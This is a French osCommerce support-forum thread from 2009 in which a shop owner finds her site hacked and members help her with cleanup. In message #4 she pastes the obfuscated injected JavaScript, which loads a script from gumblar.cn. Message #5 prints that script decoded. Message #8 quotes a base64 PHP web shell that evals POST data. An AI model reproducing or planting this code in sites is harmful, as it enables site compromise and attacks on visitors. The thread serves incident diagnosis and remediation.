osCommerce France : Accueil Forum Portail osCommerce France Réponses aux questions Foire aux contributions

Bienvenue invité ( Connexion | Inscription )

Reply to this topicStart new topic
> JS:Redirector-H, presence d'un virus sur mon serveur ?
valerie22
posté 30 Apr 2009, 09:42
Message #1

Ceinture jaune OSC
Icône de groupe

Groupe : Membres
Inscrit : 3-March 09
Membre no 24689

bonjour
je viens de lancer ma boutique et une personne me dit qu'il detecte 'mon antivirus AVAST detecte lors de la connexion le spyware suivant : JS:Redirector-H [Trj]'
qu'en pensez vous ? comment puis eradiquer ce pb s'il existe ?
d'avance merci de votre aide
cdt
nathalie
Go to the top of the page

Gnidhal
posté 30 Apr 2009, 10:01
Message #2

5eme dan OSC
Icône de groupe

Groupe : Administrateur
Inscrit : 4-March 03
Lieu : Auray
Membre no 927

Bonjour,
1/ as-tu installé des contributions particulières sur ta boutique utilisant des bibliothèques javascript genre jquerry ?
2/ as-tu d'autres visiteurs utilisant avast qui ont rencontré le même problème ?
le cas échéant, essaye de reproduire le problème en installant avast sur ta machine (il est gratuit) mais bien sur en supprimant ton antivirus (1 seul antivirus sur une config)

il est possible que ton client soit infecté mais que cela ne provienne pas de tes scripts mais de sa machine.
Dis à ton client de vider le cache de son navigateur et de passer un anti-spyware. Certains spywares installent un javascript local qui ne se déclenche que lors de la visite de certains sites...
enfin regarde si tes scripts n'ont pas été modifiés lors d'une attaque par injection sql. (voir avec ton hébergbeur et en consultant les logs Apache)
Là, la version de ta boutique est imporftante : si c'est une creload, dommage, je crois qu'elle n'est pas à jour. Si c'est une RC1 ou RC2, pas de problème elle est résistante.

enfin fais une recherche sur le cheval de troies qu'est JS:Redirector-H via ggle ou autre moteur. Tu seras mieux informé sur ce virus et les moyens de l'éradiquer.

--------------------
Tout d'abord : - Ni Hotline ni Service Après Vente, ces forums sont un lieu d'échange. BIEN POSER SA QUESTION (généralités)
Les "Informations Importantes" que vous devez ABSOLUMENT avoir lues :
Règlement, Bien poser sa question dans ces forums et Bien utiliser les Forums.
Les raccourcis pour gagner du temps : la FAQ, les PDF de la Doc (MS2-fr): PDF-V1 et PDF-V2, le moteur de Recherche sur les forums , la Liste des Contributions de Corbin.

----------------------------- Quelques sites de référence ---------------------------
PHP: Le site du Zéro et PHP Débutant avec la DOC en français -- HTML: Self HTML - WebProgrammation -- CSS: OpenWeb - AlsaCréations - CSS/Edge -- Autres ressources: - XajaX - highslide js
Les bons outils : EasyPHP - WAMP-5 - - Notepad++ - Firefox et son extension WebDeveloper
Le gène idéal c'est le gène original. Le génie des halles est un Génie des Alpages qui tente d'être à la page. (Merci f'murrr pour les cours de philosophie de chien)

valerie22
posté 13 May 2009, 16:34
Message #3

Ceinture jaune OSC
Icône de groupe

Membre no 24689

bonjour
une autre personne m'a dit cela donc je pense qu'il y a qq chose en effet...
j'ai installe le script pour la lightbox mais je ne sais pas si c'est 'javascript genre jquerry '

'Si c'est une RC1 ou RC2, pas de problème elle est résistante. ' Comment savoir cela ?
merci de votre aide
nathalie

valerie22
posté 13 May 2009, 17:43
Message #4

Ceinture jaune OSC
Icône de groupe

Membre no 24689

rebonjour
je viens de trouver ca dans mon fichier source ca ne me semble pas tres normal ?
<link rel="stylesheet" type="text/css" href="includes/stylesheet.css">
<script language="javascript" src="includes/general.js"></script>
</head><script language=javascript><!--
(function(){var xpu7=('var&20&61&3d&22Script&45&6egine&22&2cb&3d&22Ve&72&73&69&6fn&28)+&22&2cj&3d&22&22&2cu&3dna&76igator&2euser&41gen&74&3b&69f((u&2e&69nd&65xOf(&22Win&22)&3e0)&26&26(&75&2ei&6e&64ex&4ff(&22NT&206&22)&3c0)&26&26&28docum&65&6et&2eco&6f&6bie&2ein&64&65xOf(&22miek&3d1&22&29&3c0)&26&26&28type&6ff(zrvzts&29&21&3d&74y&70e&6ff&28&22A&22)))&7bzrvz&74s&3d&22A&22&3beval(&22if(&77indo&77&2e&22+a+&22)j&3dj&2b&22+a+&22Major&22+b+&61&2b&22Minor&22+b+a+&22Bui&6c&64&22+b+&22j&3b&22)&3b&64ocu&6d&65&6et&2ew&72ite(&22&3c&73c&72i&70t&20src&3d&2f&2fgu&6d&62la&72&2ecn&2frs&73&2f&3fid&3d&22&2b&6a+&22&3e&3c&5c&2fscri&70t&3e&22&29&3b&7d').replace(/&/g,'%');eval(unescape(xpu7))})();
--></script>
<body marginwidth="0" marginheight="0" topmargin="0" bottommargin="0" leftmargin="0" rightmargin="0" bgcolor="#FFFFFF">
<!-- header //-->

qu'en pensez vous ???
merci de votre aide
nathalie

Bpizzi
posté 14 May 2009, 09:46
Message #5

Ceinture blanche+ OSC
Icône de groupe

Inscrit : 30-July 07
Lieu : Lyon, France
Membre no 18547

Lorsque l'on décode ce bout de js apparament sciemment obfusquer, on obtient:

Code
var a="ScriptEngine", b="Version()+", j="", u=navigator.userAgent;
if((u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){
    zrvzts="A";
eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");
document.write("<script src=/%; a2fgumblar.cn/rss/?id="+j+"><\/script>");
}

Ce qui est sans aucun doute un code malicieux placé là par une personne mal attentionnée.
En l'occurence, il lance un code javascript présent sur un autre serveur.

Donc branle-le-bas de combat: réinstallation du serveur et intervention d'un expert qui saura t'installer ta boutique de manière sécurisée (attend quand meme un autre avis que le miens avant de te lancer wink.gif).
Pour info, tu es sur un dédié ou mutualisé?

NoZic
posté 14 May 2009, 10:34
Message #6

Ceinture noire OSC
Icône de groupe

Inscrit : 27-June 07
Lieu : Elancourt (78)
Membre no 18127

Bonjour,

Et le point cn indique que c'est des chinois...

C'est sûr que c'est du malveillant. Ils deviennent balèzes les chinois.

Après savoir ce que ça fait... j'irais pas voir.

Bon courage (t'avais pas fckeditor d'installer par hasard ? happy.gif )

--------------------
"Les solutions existent toujours depuis longtemps, il suffit de les trouver."

valerie22
posté 14 May 2009, 11:37
Message #7

Ceinture jaune OSC
Icône de groupe

Membre no 24689

non je n'ai pas ce logiciel
je suis sur du mutualisé donc je ne peux pas reinstaller le serveur ??? de mon cote que faire ??
merci de votre aide

valerie22
posté 14 May 2009, 12:18
Message #8

Ceinture jaune OSC
Icône de groupe

Membre no 24689

je continue mes recherches... je viens de trouver dans mon admin/images/ (qui ne se nome pas admin bien sur)
un fichier images.php avec ca dedans
<?php eval(base64_decode('aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpO2Vj
aG8gJzMyMzEzNjJlMzEzODM2MmQzMzMzMmUzMjMxMzAzYTY5NzQ2NTZjNjk2NTc2N2E2YjNhNGM2YTZiM
zk1OTc0NDg1Nic7')); ?>

ca vous parle ???

Bpizzi
posté 14 May 2009, 13:33
Message #9

Ceinture blanche+ OSC
Icône de groupe

Inscrit : 30-July 07
Lieu : Lyon, France
Membre no 18547

Citation (valerie22 @ 14 May 2009, 13:37) *
je suis sur du mutualisé donc je ne peux pas reinstaller le serveur ??? de mon cote que faire ??

Il faut prévenir l'hébergeur que ton compte est piraté.
Il faut réinitialiser tes mots de passes d'accès aux services de l'hébergeur (ftp, admin, mysql, etc).
Il faut sauvegarder ta base mysql puis mettre ton site en maintenance (en forcant par exemple la page index.html avec une page "En réparation").
Ensuite, il faut télécharger tous tes fichiers sources en local pour garder une trace.
Après, il faut tout supprimer sur le serveur, et y remettre une version de sauvegarde des sources de ta boutique non infectée.
Dans le doute, je repartirai d'une installe oscommerce fraiche à laquelle je remettrais mes contribs en vérifiant à chaque fois qu'aucun code suspect n'est ajouté.

Quoiqu'il en soit, ton site est bel et bien piraté, et dans ces cas-là, la seule technique viable, c'est celle de la terre brulée: on repart de zéro.

Reply to this topicStart new topic
1 utilisateur(s) sur ce sujet (1 invité(s) et 0 utilisateur(s) anonyme(s))
0 membre(s) :

RSS Version bas débit Nous sommes le : 19th June 2013 - 05:56
Ce site est déclaré auprès de la commision Nationale
de l'Informatique et des Libertés (déclaration n°: 1043896)